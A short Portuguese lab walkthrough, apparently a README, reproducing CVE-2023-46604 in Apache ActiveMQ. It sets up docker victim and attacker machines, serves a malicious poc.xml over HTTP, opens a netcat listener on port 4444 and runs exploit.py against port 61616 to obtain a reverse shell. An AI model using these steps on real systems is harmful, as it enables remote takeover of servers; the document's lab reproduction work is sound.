
Exploit para CVE-2023-46604 no Apache ActiveMQ, permitindo execução remota de código via payloads XML manipulados e estabelecimento de shell reverso.
CVE-2023-46604

Construir docker-compose contendo 2 imagens, incluindo máquina vítima e máquina alvo, de acordo com o ambiente necessário Na máquina vítima, iniciar o ActiveMQ
Mudar para máquina atacante:
Abrir serviço HTTP para enviar o PoC: python3 -m http.server
Usar netcat para escutar conexão com a máquina atacante nc -nlvp 4444
Enviar payload para criar uma conexão reverse shell para a máquina atacante python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Onde:
Exploit.py: arquivo de código que explora a vulnerabilidade
-I 172.18.0.3: Endereço IP da máquina que envia o payload
-p 61616: Porta na qual o ActiveMQ da máquina vítima está ouvindo
--xml http://172.18.0.2:8000/poc.xml: URL do arquivo poc.xml na máquina atacante
Pode-se ver que, após executar o comando para executar o arquivo 'exploit.py', o código de exploração envia um pacote 'poc.xml' no servidor web para o alvo, que é o endereço do serviço ActiveMQ em execução no servidor alvo. Simultaneamente, o servidor web HTTP na máquina atacante também recebe uma solicitação enviada a partir do endereço IP da máquina alvo.
Após o envio do payload, mude para o terminal que está ouvindo na porta 4444 da máquina atacante. Vemos que o reverse shell da máquina vítima foi enviado.